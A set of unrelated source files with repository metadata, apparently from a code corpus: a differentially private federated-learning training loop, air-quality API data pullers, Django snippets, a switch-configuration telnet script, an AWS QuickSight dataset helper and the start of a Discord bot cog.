run_differentially_private_federated_averaging(loss, train_op, eval_correct, DATA, data_placeholder,
labels_placeholder)
--------------------------------------------------------------------------------------------------------------------
The graph that train_op, loss and eval_op belong to should have a global_step variable.
:param loss: TENSORFLOW node that computes the current loss
:param train_op: TENSORFLOW Training_op
:param eval_correct: TENSORFLOW node that evaluates the number of correct predictions
:param data: A class instance with attributes:
.data_set : The training data stored in a list or numpy array.
.label_set : The training labels stored in a list or numpy array.
The indices should correspond to .data_set. This means a single index
corresponds to a data(x)-label(y) pair used for training:
(x_i, y_i) = (data.data_set(i),data.label_set(i))
.client_set : A nested list or numpy array. len(data.client_set) is the total
number of clients. for any j, data.client_set[j] is a list (or array)
holding indices. these indices specify the data points that client j
holds.
i.e. if i \in data.client_set[j], then client j owns (x_i, y_i)
.vali_data_set : The validation data stored in a list or numpy array.
.vali_label_set : The validation labels stored in a list or numpy array.
:param data_placeholder: The placeholder from the tensorflow graph that is used to feed the model with data
:param label_placeholder: The placeholder from the tensorflow graph that is used to feed the model with labels
:param privacy_agent: A class instance that has callabels .get_m(r) .get_Sigma(r) .get_bound(), where r is the
communication round.
:param b: Batchsize
:param e: Epochs to run on each client
:param record_privacy: Whether to record the privacy or not
:param m: If specified, a privacyAgent is not used, instead the parameter is kept constant
:param sigma: If specified, a privacyAgent is not used, instead the parameter is kept constant
:param eps: The epsilon for epsilon-delta privacy
:param save_dir: Directory to store the process
:param log_dir: Directory to store the graph
:param max_comm_rounds: The maximum number of allowed communication rounds
:param gm: Whether to use a Gaussian Mechanism or not.
:param saver_func: A function that specifies where and how to save progress: Note that the usual tensorflow
tracking will not work
:param save_params: save all weights_throughout training.
:return:
"""
# If no privacy agent was specified, the default privacy agent is used.
if not privacy_agent:
if method==0:
nstr="完善版本算法模型diff"
elif method==1:
nstr="完善版无噪声"
elif method==2:
nstr="完善版联邦平均"
privacy_agent = PrivAgent(len(data.client_set), 'K_'+str(MODEL_NUM)+'_'+nstr)
# A Flags instance is created that will fuse all specified parameters and default those that are not specified.
FLAGS = Flag(len(data.client_set), b, e, record_privacy, m, sigma, eps, save_dir, log_dir, max_comm_rounds, gm,
privacy_agent, MODEL_NUM, THV, C, method)
# Check whether the specified parameters make sense.
FLAGS = check_validaity_of_FLAGS(FLAGS)
# At this point, FLAGS.save_dir specifies both; where we save progress and where we assume the data is stored
save_dir = saver_func(FLAGS)
# This function will retrieve the variable associated to the global step and create nodes that serve to
# increase and reset it to a certain value.
increase_global_step, set_global_step = global_step_creator()
# - model_placeholder : a dictionary in which there is a placeholder stored for every trainable variable defined
# in the tensorflow graph. Each placeholder corresponds to one trainable variable and has
# the same shape and dtype as that variable. in addition, the placeholder has the same
# name as the Variable, but a '_placeholder:0' added to it. The keys of the dictionary
# correspond to the name of the respective placeholder
model_placeholder = dict(zip([Vname_to_FeedPname(var) for var in tf.trainable_variables()],
[tf.placeholder(name=Vname_to_Pname(var),
shape=var.shape,
dtype=tf.float32)
for var in tf.trainable_variables()]))
# - assignments : Is a list of nodes. when run, all trainable variables are set to the value specified through
# the placeholders in 'model_placeholder'.
assignments = [tf.assign(var, model_placeholder[Vname_to_FeedPname(var)]) for var in
tf.trainable_variables()]
# load_from_directory_or_initialize checks whether there is a model at 'save_dir' corresponding to the one we
# are building. If so, training is resumed, if not, it returns: - model = []
# - accuracy_accountant = []
# - delta_accountant = []
# - real_round = 0
# And initializes a Differential_Privacy_Accountant as acc
# model, accuracy_accountant, delta_accountant, acc, real_round, FLAGS, computed_deltas = \
# load_from_directory_or_initialize(save_dir, FLAGS)
model, accuracy_accountant, clients_epoch,timeList, acc, real_round, FLAGS = \
load_from_directory_or_initialize_K_model(save_dir, FLAGS)
m = int(FLAGS.m)
sigma = float(FLAGS.sigma)
# - m : amount of clients participating in a round
# - sigma : variable for the Gaussian Mechanism.
# Both will only be used if no Privacy_Agent is deployed.
################################################################################################################
# Test Part
# if isTest==True:
# assert (model is not None)
# sess = tf.Session()
#
# if method == 0 or method == 1:
# # 1.0/2.0 每轮测试选择所有模型的平均模型进行测试
# average_model = copy.deepcopy(model[0])
# for k in model[0].keys():
# for i in range(1, FLAGS.MODEL_NUM):
# average_model[k] = average_model[k] + model[i][k]
# average_model[k] = average_model[k] / FLAGS.MODEL_NUM
#
# # Setting the trainable Variables in the graph to the values stored in feed_dict 'model'
# sess.run(assignments, feed_dict=average_model)
# else:
# sess.run(assignments, feed_dict=model)
#
# feed_dict = {str(data_placeholder.name): np.asarray(data.x_vali),
# str(label_placeholder.name): np.asarray(data.y_vali)}
#
# # compute the loss on the validation set.
# global_loss = sess.run(loss, feed_dict=feed_dict)
# count = sess.run(eval_correct, feed_dict=feed_dict)
# accuracy = float(count) / float(len(data.y_vali))
# accuracy_accountant.append(accuracy)
#
# print("平均模型准确率")
# print_loss_and_accuracy(global_loss, accuracy)
#
# for i in range(FLAGS.MODEL_NUM):
# sess.run(assignments, feed_dict=model[i])
# feed_dict = {str(data_placeholder.name): np.asarray(data.x_vali),
# str(label_placeholder.name): np.asarray(data.y_vali)}
#
# # compute the loss on the validation set.
# global_loss = sess.run(loss, feed_dict=feed_dict)
# count = sess.run(eval_correct, feed_dict=feed_dict)
# accuracy = float(count) / float(len(data.y_vali))
# accuracy_accountant.append(accuracy)
#
# print("第"+str(i)+"个模型准确率")
# print_loss_and_accuracy(global_loss, accuracy)
# return
################################################################################################################
# Usual Tensorflow...
init = tf.global_variables_initializer()
sess = tf.Session()
sess.run(init)
################################################################################################################
# If there was no loadable model, we initialize a model:
# - model : dictionary having as keys the names of the placeholders associated to each variable. It will serve
# as a feed_dict to assign values to the placeholders which are used to set the variables to
# specific values.
if not model:
# 0.0 训练开始前初始化K个模型参数
if method==2:
model=dict(zip([Vname_to_FeedPname(var) for var in tf.trainable_variables()],
[sess.run(var) for var in tf.trainable_variables()]))
model['global_step_placeholder:0'] = 0
else:
for i in range(FLAGS.MODEL_NUM):
model.append(dict(zip([Vname_to_FeedPname(var) for var in tf.trainable_variables()],
[sess.run(var) for var in tf.trainable_variables()])))
model[i]['global_step_placeholder:0'] = 0
sess.run(init)
# end 0.0
# original 只有一个模型
# model = dict(zip([Vname_to_FeedPname(var) for var in tf.trainable_variables()],
# [sess.run(var) for var in tf.trainable_variables()]))
# model['global_step_placeholder:0'] = 0
# original
real_round = 0
weights_accountant = []
# If a model is loaded, and we are not relearning it (relearning means that we once already finished such a model
# and we are learning it again to average the outcomes), we have to get the privacy accountant up to date. This
# means, that we have to iterate the privacy accountant over all the m, sigmas that correspond to already completed
# communication
if not FLAGS.relearn and real_round > 0:
bring_Accountant_up_to_date(acc, sess, real_round, privacy_agent, FLAGS)
################################################################################################################
# This is where the actual communication rounds start:
data_set_asarray = np.asarray(data.sorted_x_train)
label_set_asarray = np.asarray(data.sorted_y_train)
time_start = time.time()
for r in range(18):
# First, we check whether we are loading a model, if so, we have to skip the first allocation, as it took place
# already.
# 1.0 每轮选择一个模型,数据集非IID,非噪声梯度更新
# choose one model
# choose_model = random.randrange(MODEL_NUM)
# end 1.0
# compute result
# need use average model
# but dont care
if not (FLAGS.loaded and r == 0):
if method==0 or method==1 :
# 1.0/2.0 每轮测试选择所有模型的平均模型进行测试
average_model = copy.deepcopy(model[0])
for k in model[0].keys():
for i in range(1, FLAGS.MODEL_NUM):
average_model[k] = average_model[k] + model[i][k]
average_model[k]=average_model[k] / FLAGS.MODEL_NUM
# Setting the trainable Variables in the graph to the values stored in feed_dict 'model'
sess.run(assignments, feed_dict=average_model)
else:
sess.run(assignments, feed_dict=model)
# end 1.0
# original 只有一个模型
#sess.run(assignments, feed_dict=model)
# end original
# create a feed-dict holding the validation set.
feed_dict = {str(data_placeholder.name): np.asarray(data.x_vali),
str(label_placeholder.name): np.asarray(data.y_vali)}
# compute the loss on the validation set.
global_loss = sess.run(loss, feed_dict=feed_dict)
count = sess.run(eval_correct, feed_dict=feed_dict)
accuracy = float(count) / float(len(data.y_vali))
accuracy_accountant.append(accuracy)
timeList.append(int(time.time()-time_start))
print_loss_and_accuracy(global_loss, accuracy)
save_progress_K_model(save_dir, model, accuracy_accountant, privacy_agent, clients_epoch,timeList, FLAGS)
if isTest==True:
with open(save_dir+"/model_diff.txt", 'a+') as f:
f.write("round"+str(real_round)+":\n")
f.write(str(accuracy)+" "+str(global_loss))
for k in model[0].keys():
mu_Test = np.mean(average_model[k])
sigma_Test = np.var(average_model[k])
f.write(" "+str(mu_Test)+" "+str(sigma_Test))
f.write("\n")
for i in range(FLAGS.MODEL_NUM):
sess.run(assignments, feed_dict=model[i])
feed_dict = {str(data_placeholder.name): np.asarray(data.x_vali),
str(label_placeholder.name): np.asarray(data.y_vali)}
# compute the loss on the validation set.
global_loss = sess.run(loss, feed_dict=feed_dict)
count = sess.run(eval_correct, feed_dict=feed_dict)
accuracy = float(count) / float(len(data.y_vali))
accuracy_accountant.append(accuracy)
f.write(str(accuracy) + " " + str(global_loss) + " ")
for k in model[0].keys():
mu_Test = np.mean(model[i][k])
sigma_Test = np.var(model[i][k])
f.write(" " + str(mu_Test) + " " + str(sigma_Test))
f.write("\n")
# original 计算隐私边界并自动停止
# if delta_accountant[-1] > privacy_agent.get_bound() or math.isnan(delta_accountant[-1]):
# print('************** The last step exhausted the privacy budget **************')
# if not math.isnan(delta_accountant[-1]):
# try:
# None
# finally:
# save_progress(save_dir, model, delta_accountant + [float('nan')],
# accuracy_accountant + [float('nan')], privacy_agent, FLAGS)
# return accuracy_accountant, delta_accountant, model
# else:
# try:
# None
# finally:
# end original
#save_progress(save_dir, model, delta_accountant, accuracy_accountant, privacy_agent, FLAGS)
############################################################################################################
# Start of a new communication round
real_round = real_round + 1
print_new_comm_round(real_round)
if FLAGS.priv_agent:
m = int(privacy_agent.get_m(int(real_round)))
sigma = privacy_agent.get_Sigma(int(real_round))
print('Clients participating: ' + str(m))
# Randomly choose a total of m (out of n) client-indices that participate in this round
# randomly permute a range-list of length n: [1,2,3...n] --> [5,2,7..3]
# perm = np.random.permutation(FLAGS.n)
perm = np.arange(FLAGS.n)
# Use the first m entries of the permuted list to decide which clients (and their sets) will participate in
# this round. participating_clients is therefore a nested list of length m. participating_clients[i] should be
# a list of integers that specify which data points are held by client i. Note that this nested list is a
# mapping only. the actual data is stored in data.data_set.
s = perm[0:m].tolist()
participating_clients = [data.client_set[k] for k in s]
if method==0:
for c in range(5):
participating_clients[c]=participating_clients[c][:225]
for c in range(5,100):
participating_clients[c]=participating_clients[c][:475]
global finished_thread_Count
finished_thread_Count=0
# For each client c (out of the m chosen ones):
if method == 2:
for c in range(m):
sess.run(assignments + [set_global_step], feed_dict=model)
data_ind = np.split(np.asarray(participating_clients[c]), FLAGS.b, 0)
for e in range(int(FLAGS.e)):
for step in range(len(data_ind)):
real_step = sess.run(increase_global_step)
batch_ind = data_ind[step]
feed_dict = {str(data_placeholder.name): data_set_asarray[[int(j) for j in batch_ind]],
str(label_placeholder.name): label_set_asarray[[int(j) for j in batch_ind]]}
_ = sess.run([train_op], feed_dict=feed_dict)
if c == 0:
weights_accountant = WeightsAccountant(sess, model, sigma, real_round, participating_clients[c].shape[0] * FLAGS.e)
else:
weights_accountant.allocate(sess)
model = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, [])
model['global_step_placeholder:0'] = real_step
# 2.0 每台机器选择一个模型,数据集非IID,非噪声梯度更新
# choose one model
# choose_model = random.randrange(FLAGS.MODEL_NUM)
# Assign the global model and set the global step. This is obsolete when the first client trains,
# but as soon as the next client trains, all progress allocated before, has to be discarded and the
# trainable variables reset to the values specified in 'model'
# sess.run(assignments + [set_global_step], feed_dict=model[choose_model])
# end 1.0
# original 只有一个模型
#sess.run(assignments + [set_global_step], feed_dict=model)
# end original
# allocate a list, holding data indices associated to client c and split into batches.
# data_ind = np.split(np.asarray(participating_clients[c]), FLAGS.b, 0)
# 2.0 每台机器选择一个模型,噪声和非噪声都有
# replaceModel = random.randrange(FLAGS.MODEL_NUM)
# clients_epoch[replaceModel][s[c]] = clients_epoch[choose_model][s[c]] + FLAGS.e
# target_sigma = compute_noise(participating_clients[c].shape[0],
# participating_clients[c].shape[0] / FLAGS.b, 1,
# clients_epoch[replaceModel][s[c]], 1e-3, 1e-6)
#
# sess.run(assignments + [set_global_step], feed_dict=model[choose_model])
# #end 2.0
#
# # e = Epoch
# for e in range(int(FLAGS.e)):
# for step in range(len(data_ind)):
# # increase the global_step count (it's used for the learning rate.)
# real_step = sess.run(increase_global_step)
# # batch_ind holds the indices of the current batch
# batch_ind = data_ind[step]
#
# # Fill a feed dictionary with the actual set of data and labels using the data and labels associated
# # to the indices stored in batch_ind:
#
# # 1.0
# # for j in batch_ind:
# # feed_dict = {str(data_placeholder.name): data_set_asarray[[int(j)]],
# # str(label_placeholder.name): label_set_asarray[[int(j)]]}
# # sess.run(assignments + [set_global_step], feed_dict=model[choose_model])
# # _ = sess.run([train_op], feed_dict=feed_dict)
# # if j == batch_ind[0]:
# # # If we just trained the first client in a comm_round, We override the old weights_accountant (or,
# # # if this was the first comm_round, we allocate a new one. The Weights_accountant keeps track of
# # # all client updates throughout a communication round.
# # weights_accountant = WeightsAccountant(sess, model[choose_model], target_sigma, real_round,
# # participating_clients[c].shape[0])
# # else:
# # # Allocate the client update, if this is not the first client in a communication round
# # weights_accountant.allocate(sess)
# #
# # newModel = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, [])
# # model[replaceModel] = newModel
# # model[replaceModel]['global_step_placeholder:0'] = real_step
# # end 1.0
# # original
# feed_dict = {str(data_placeholder.name): data_set_asarray[[int(j) for j in batch_ind]],
# str(label_placeholder.name): label_set_asarray[[int(j) for j in batch_ind]]}
# # Run one optimization step.
# _ = sess.run([train_op], feed_dict=feed_dict)
# # end original
#
# # original/1.0 每轮选择一个模型,数据集非IID,非噪声梯度更新
# # if c == 0:
# #
# # # If we just trained the first client in a comm_round, We override the old weights_accountant (or,
# # # if this was the first comm_round, we allocate a new one. The Weights_accountant keeps track of
# # # all client updates throughout a communication round.
# # weights_accountant = WeightsAccountant(sess, model[choose_model], sigma, real_round)
# # else:
# # # Allocate the client update, if this is not the first client in a communication round
# # weights_accountant.allocate(sess)
# # end 1.0
#
# # 2.0 每台机器选择一个模型,噪声和非噪声都有
# # if step==0 and e==0:
# # weights_accountant = WeightsAccountant(sess, model[choose_model], target_sigma, real_round, participating_clients[c].shape[0])
# # else:
# # weights_accountant.allocate(sess)
# # newModel = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, computed_deltas)
#
# weights_accountant = WeightsAccountant(sess, model[choose_model], target_sigma, real_round,
# participating_clients[c].shape[0]*FLAGS.e)
# newModel = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, [])
#
# model[replaceModel] = newModel
# # original
# # delta_accountant.append(delta)
# # end original
# # if c==0:
# # target_sigma = compute_noise(participating_clients[c].shape[0], participating_clients[c].shape[0]/FLAGS.b, 1, clients_epoch[replaceModel][s[c]], 1e-3, 1e-6)
# # eps, _ = compute_dp_sgd_privacy(participating_clients[c].shape[0], participating_clients[c].shape[0]/FLAGS.b, sigma, clients_epoch[s[c]], 1e-3)
# model[replaceModel]['global_step_placeholder:0'] = real_step
# end 2.0
# newModel = Single_user_train(sess, assignments, set_global_step, model, participating_clients,
# clients_epoch,
# choose_model, replaceModel,
# data_ind, increase_global_step, FLAGS, data_placeholder, label_placeholder,
# data_set_asarray, label_set_asarray,
# s, c, train_op, real_round, acc)
# End of a communication round
############################################################################################################
elif method==0:
for c in range(m):
Single_user_train(sess, assignments, set_global_step, model, participating_clients, clients_epoch,
increase_global_step, FLAGS, data_placeholder, label_placeholder, data_set_asarray,label_set_asarray,
s, c, train_op, real_round, acc)
# for c in range(m):
# threading.Thread(target=Single_user_train, args=(sess, assignments, set_global_step, model, participating_clients, clients_epoch,
# increase_global_step, FLAGS, data_placeholder, label_placeholder, data_set_asarray,label_set_asarray,
# s, c, train_op, real_round, acc)).start()
# Single_user_train(sess, assignments, set_global_step, model, participating_clients, clients_epoch,
# increase_global_step, FLAGS, data_placeholder, label_placeholder, data_set_asarray,label_set_asarray,
# s, c, train_op, real_round, acc)
# task = pool.submit(Single_user_train, sess, assignments, set_global_step, model, participating_clients, clients_epoch,
# increase_global_step, FLAGS, data_placeholder, label_placeholder, data_set_asarray,
# label_set_asarray, s, c, train_op, real_round, acc)
# model = task.result()
# while finished_thread_Count!=m:
# pass
else:
for c in range(m):
Single_user_train(sess, assignments, set_global_step, model, participating_clients, clients_epoch,
increase_global_step, FLAGS, data_placeholder, label_placeholder, data_set_asarray,label_set_asarray,
s, c, train_op, real_round, acc)
print('......Communication round %s completed' % str(real_round))
# Compute a new model according to the updates and the Gaussian mechanism specifications from FLAGS
# Also, if computed_deltas is an empty list, compute delta; the probability of Epsilon-Differential Privacy
# being broken by allocating the model. If computed_deltas is passed, instead of computing delta, the
# pre-computed vaue is used.
# original 每轮训练选择一个模型
#model, delta = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, computed_deltas)
#end original
# 1.0 每轮训练选择一个模型
#replace model
#newModel, delta = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, computed_deltas)
#replaceModel = random.randrange(MODEL_NUM)
#model[replaceModel] = newModel
# append delta to a list.
# delta_accountant.append(delta)
# Set the global_step to the current step of the last client, such that the next clients can feed it into
# the learning rate.
#model[replaceModel]['global_step_placeholder:0'] = real_step
# PRINT the progress and stage of affairs.
#print(' - Epsilon-Delta Privacy:' + str([FLAGS.eps, delta]))
# end 1.0
if save_params:
weights_accountant.save_params(save_dir)
time_end = time.time()
with open(save_dir+'/time.txt', 'w') as f:
f.write(str(time_end-time_start)) # 文件的写操作
return [], [], []
| 55.937397 | 185 | 0.556459 |
f04513d8a52e2b2f005e1b339084909e7473832b | 3,930 | py | Python | src/data.py | BlueViper8907/Air-Quality | 5947c08bc96cf00e8efa609c1470c2de1c86ae86 | [
"MIT"
] | 2 | 2021-09-02T17:03:13.000Z | 2021-09-08T14:59:38.000Z | src/data.py | BlueViper8907/Air-Quality | 5947c08bc96cf00e8efa609c1470c2de1c86ae86 | [
"MIT"
] | 34 | 2021-06-24T00:32:03.000Z | 2022-03-21T21:58:18.000Z | src/data.py | BlueViper8907/Air-Quality | 5947c08bc96cf00e8efa609c1470c2de1c86ae86 | [
"MIT"
] | 3 | 2021-09-14T02:48:16.000Z | 2021-11-18T01:06:46.000Z | from datetime import datetime
from datetime import timedelta
import pandas as pd
import requests
def pull_airnow_sensor_data(
api_key: str,
start_date: str,
end_date: str,
measures: list=['OZONE','PM25','CO'],
bbox: list=[-87.912584,41.587576,-87.522570,42.109292]
):
'''
Pulls all AirNow sensor data within the definied bounding box between
the start and end dates defined.
PARAMETERS
===
api_key: str, personal AirNow API key
start_date: str, defines the beginning of desired AirNow data.
Format: Year-Month-Day, 2021-06-21
end_date: str, defines the end of desired AirNow data.
Format: Year-Month-Day, 2021-06-21
measures: list-like, an iterable list of desired measures to pull
from AirNow. Defaults are Ozone, PM 2.5, and Carbon Monoxide
bbox: list-like, an iterable list of floats defining the bounding
box from which to grab AirNow data.
OUTPUT
===
sensor_data: pandas dataframe, contains all relevant AirNow data
'''
# convert measures to a string for API call
PARAMS = ''.join([s+',' if s != measures[-1] else s for s in measures])
# convert bbox to a string for API call
BBOX_x=''.join([str(s)+',' if s != bbox[-1] else str(s) for s in bbox])
# define query for API call
query=(
f"https://www.airnowapi.org/aq/data/?startDate={start_date}T02&endDate={end_date}" \
f"T03¶meters={PARAMS}&BBOX={BBOX_x}&dataType=B&format=text/csv" \
f"&verbose=0&nowcastonly=0&includerawconcentrations=0&API_KEY={api_key}"
)
# call API query into a pandas dataframe for processing
sensor_data=pd.read_csv(
query,
names=['Latitude','Longitude','DateTime','Parameter','Concentration','Unit','AQI','Category']
)
return sensor_data
def pull_purpleair_data(
sensors: pd.DataFrame,
city: str,
neighborhood: str,
key: str
) -> pd.DataFrame:
'''
Get neighborhood-specific sensor data from PurpleAir
'''
# create list of sensor
sensor_list = "|".join(
sensors[
(sensors.City == city)
& (sensors.Neighborhood == neighborhood)
].SensorID.astype(str).tolist()
)
pa_query = f'https://www.purpleair.com/json?key={key}&show={sensor_list}'
# pull data
pa_request = requests.get(pa_query)
json_data = pa_request.json()
# read into dataframe
pa_sensor_df = pd.DataFrame(json_data['results'])
return pa_sensor_df
def pull_purpleair_historical(
weeks_to_get: int,
channel: str,
key: str,
col_names: dict,
start_date: datetime = datetime.now(),
) -> pd.DataFrame:
"""
Get data from the ThingSpeak API one week at a time up to weeks_to_get weeks in the past
"""
to_week = start_date - timedelta(weeks=1)
url = f'https://thingspeak.com/channels/{channel}/feed.csv?api_key={key}&offset=0&average=&round=2&start={to_week.strftime("%Y-%m-%d")}%2000:00:00&end={start_date.strftime("%Y-%m-%d")}%2000:00:00'
weekly_data = pd.read_csv(url)
if weeks_to_get > 1:
for _ in range(weeks_to_get):
start_date = to_week
to_week = to_week - timedelta(weeks=1)
url = f'https://thingspeak.com/channels/{channel}/feed.csv?api_key={key}&offset=0&average=&round=2&start={to_week.strftime("%Y-%m-%d")}%2000:00:00&end={start_date.strftime("%Y-%m-%d")}%2000:00:00'
weekly_data = pd.concat([weekly_data, pd.read_csv(url)])
# rename the columns
weekly_data.rename(columns=col_names, inplace=True)
weekly_data['created_at'] = pd.to_datetime(
weekly_data['created_at'], format='%Y-%m-%d %H:%M:%S %Z')
weekly_data.index = weekly_data.pop('entry_id')
weekly_data['channel'] = channel
return weekly_data | 34.473684 | 212 | 0.634097 |
0e1f09bd16318c053c60d0edbbf752aca28f4f22 | 152 | py | Python | About/admin.py | Django-Development/marketing-your-own-service-on-django | 7bd4f20c1c0cd7319b546f1e09fda7c1403ec89c | [
"MIT"
] | null | null | null | About/admin.py | Django-Development/marketing-your-own-service-on-django | 7bd4f20c1c0cd7319b546f1e09fda7c1403ec89c | [
"MIT"
] | null | null | null | About/admin.py | Django-Development/marketing-your-own-service-on-django | 7bd4f20c1c0cd7319b546f1e09fda7c1403ec89c | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import *
# Register your models here.
admin.site.register(AboutItems)
admin.site.register(OurCustomers)
| 19 | 33 | 0.802632 |
fded30c60a38056298d6bfa20b56f493ec52b467 | 216 | py | Python | hokudai_furima/matching_offer/templatetags/details_images_carousel.py | TetsuFe/hokuma | b981a52b3bf8d7268bf791c5827bbe8af90afef6 | [
"MIT"
] | 1 | 2021-02-13T03:51:42.000Z | 2021-02-13T03:51:42.000Z | hokudai_furima/matching_offer/templatetags/details_images_carousel.py | TetsuFe/hokuma | b981a52b3bf8d7268bf791c5827bbe8af90afef6 | [
"MIT"
] | null | null | null | hokudai_furima/matching_offer/templatetags/details_images_carousel.py | TetsuFe/hokuma | b981a52b3bf8d7268bf791c5827bbe8af90afef6 | [
"MIT"
] | 1 | 2021-09-18T09:25:48.000Z | 2021-09-18T09:25:48.000Z | from django import template
register = template.Library()
@register.inclusion_tag('matching_offer/_details_images_carousel.html')
def details_images_carousel(details_images):
return {'images': details_images}
| 24 | 71 | 0.814815 |
3770b04d765f2ab5efa1bbf950c464f147d0e0c9 | 459 | py | Python | arista.py | snehapatekar1/sneha | a4b9eea1915e8f35ec8695f037608e9b9f6e4ad6 | [
"Apache-2.0"
] | null | null | null | arista.py | snehapatekar1/sneha | a4b9eea1915e8f35ec8695f037608e9b9f6e4ad6 | [
"Apache-2.0"
] | null | null | null | arista.py | snehapatekar1/sneha | a4b9eea1915e8f35ec8695f037608e9b9f6e4ad6 | [
"Apache-2.0"
] | null | null | null | import getpass
import sys
import telnetlib
HOST="192.168.146.150"
user=raw_input("Enter your username:")
password=getpass.getpass()
tn=telnetlib.Telnet(HOST, timeout=5)
tn.read_until("Username:")
tn.write(user+"\n")
if password:
tn.read_until("Password:")
tn.write(password+"\n")
tn.write("en\n")
tn.write("conf t\n")
tn.write("int lo 0\n")
tn.write("ip address 1.1.1.1 255.255.255.255\n")
tn.write("end\n")
tn.write("exit\n")
print tn.read_all()
| 19.125 | 48 | 0.697168 |
8346226b6fc2b56b07e4d812380750bfefedfd75 | 6,120 | py | Python | source/lambda/quicksight-custom-resources/util/dataset.py | awslabs/aws-devops-monitoring-dashboard | 26a75acb2a5bf006e6dd86f9f6608a5c56a11258 | [
"Apache-2.0"
] | 39 | 2021-03-26T17:20:41.000Z | 2021-09-11T16:19:37.000Z | source/lambda/quicksight-custom-resources/util/dataset.py | awslabs/aws-devops-monitoring-dashboard | 26a75acb2a5bf006e6dd86f9f6608a5c56a11258 | [
"Apache-2.0"
] | 11 | 2021-03-25T18:33:56.000Z | 2021-07-27T12:58:44.000Z | source/lambda/quicksight-custom-resources/util/dataset.py | awslabs/aws-devops-monitoring-dashboard | 26a75acb2a5bf006e6dd86f9f6608a5c56a11258 | [
"Apache-2.0"
] | 4 | 2021-06-09T18:56:17.000Z | 2021-09-05T16:49:22.000Z | # #####################################################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the 'license' file accompanying this file. This file is distributed on an 'AS IS' BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
# #####################################################################################################################
from tenacity import retry, retry_if_exception_type, stop_after_attempt
from util.helpers import get_quicksight_client
from util.logging import get_logger
from util.quicksight_resource import QuickSightFailure, QuickSightResource
logger = get_logger(__name__)
class DataSet(QuickSightResource):
def __init__(
self, quicksight_application=None, data_source=None, data_set_sub_type=None, props=None
):
super().__init__(quicksight_application=quicksight_application, type = "dataset", sub_type=data_set_sub_type, props=props)
self.use_props(props)
self.data_source = data_source
# override to set schema name directly
# instead of using the one in the config file
self.schema = None
self.config_data = dict()
self._load_config(self.type, quicksight_application.get_supported_data_set_sub_types(), self.config_data)
def create(self):
if not self.data_source:
raise ValueError("missing datasource value when creating dataset")
logger.info(f"creating quicksight dataset id:{self.id}")
physical_table_map = self._get_map(self.sub_type, "PhysicalTableMap")
logical_table_map = self._get_map(self.sub_type, "LogicalTableMap")
response = self._create_data_set(physical_table_map, logical_table_map)
return response
def delete(self):
logger.info(f"deleting quicksight dataset id:{self.id}")
quicksight_client = get_quicksight_client()
response = quicksight_client.delete_data_set(AwsAccountId=self.aws_account_id, DataSetId=self.id)
logger.info(f"finished deleting quicksight dataset for id:{self.id}, " f"response:{response}")
self.arn = response["Arn"]
return response
@retry(retry=retry_if_exception_type(QuickSightFailure), stop=stop_after_attempt(3))
def _create_data_set(self, physical_table_map, logical_table_map):
quicksight_client = get_quicksight_client()
self._update_data_source_arn(physical_table_map)
self._update_schema(physical_table_map)
try:
response = quicksight_client.create_data_set(
AwsAccountId=self.aws_account_id,
DataSetId=self.id,
Name=self.name,
Permissions=self._get_permissions(),
PhysicalTableMap=physical_table_map,
LogicalTableMap=logical_table_map,
ImportMode="DIRECT_QUERY",
)
logger.info(f"finished creating quicksight create_data_set id:{self.id}, " f"response:{response}")
except quicksight_client.exceptions.ResourceExistsException:
logger.info(f"dataset for id:{self.id} already exists")
response = quicksight_client.describe_data_set(AwsAccountId=self.aws_account_id, DataSetId=self.id)
response = response["DataSet"]
except quicksight_client.exceptions.InvalidParameterValueException as exc:
logger.error(str(exc))
raise QuickSightFailure()
self.arn = response["Arn"]
return response
def _get_permissions(self):
# The principal is the owner of the resource and create the resources and is given full actions for the type
permissions = [
{
"Principal": self.principal_arn,
"Actions": [
"quicksight:DescribeDataSet",
"quicksight:DescribeDataSetPermissions",
"quicksight:PassDataSet",
"quicksight:DescribeIngestion",
"quicksight:ListIngestions",
"quicksight:UpdateDataSet",
"quicksight:DeleteDataSet",
"quicksight:CreateIngestion",
"quicksight:CancelIngestion",
"quicksight:UpdateDataSetPermissions",
],
}
]
return permissions
def _update_schema(self, obj):
if not self.schema:
logger.debug(f"Schema name is not set in object. Using the ones from config file as is in RelationalTable[].Schema in PhysicalTableMap")
return
for (key, value) in obj.items():
logger.debug(f"Updating schema arn value of RelationalTable.Schema in {key} PhysicalTableMap")
value["RelationalTable"]["Schema"] = self.schema
def _update_data_source_arn(self, obj):
for (key, value) in obj.items():
logger.debug(f"Updating datasource arn value of RelationalTable.DataSourceArn in {key} PhysicalTableMap")
value["RelationalTable"]["DataSourceArn"] = self.data_source.arn
| 51 | 148 | 0.576144 |
ec2a9136d42ebe043e9c0e8bf8539911439a1bca | 31,135 | py | Python | cmdchannel/cmdchannel.py | AAA3A-AAA3A/AAA3A-cogs | 076ff390610e2470a086bdae41647ee21f01c323 | [
"MIT"
] | 1 | 2022-03-17T02:06:37.000Z | 2022-03-17T02:06:37.000Z | cmdchannel/cmdchannel.py | AAA3A-AAA3A/AAA3A-cogs | 076ff390610e2470a086bdae41647ee21f01c323 | [
"MIT"
] | 2 | 2022-03-07T03:29:33.000Z | 2022-03-17T06:51:43.000Z | cmdchannel/cmdchannel.py | AAA3A-AAA3A/AAA3A-cogs | 076ff390610e2470a086bdae41647ee21f01c323 | [
"MIT"
] | 2 | 2021-11-24T19:31:55.000Z | 2022-01-02T06:34:22.000Z | from .AAA3A_utils.cogsutils import CogsUtils # isort:skip
from redbot.core import commands # isort:skip
from redbot.core.i18n import Translator, cog_i18n # isort:skip
from redbot.core.bot import Red # isort:skip
import discord # isort:skip
import typing # isort:skip
from redbot.core import Config
# Credits:
# Thanks to @epic guy on Discord for the basic syntax (command groups, commands) and also commands (await ctx.send, await ctx.author.send, await ctx.message.delete())!
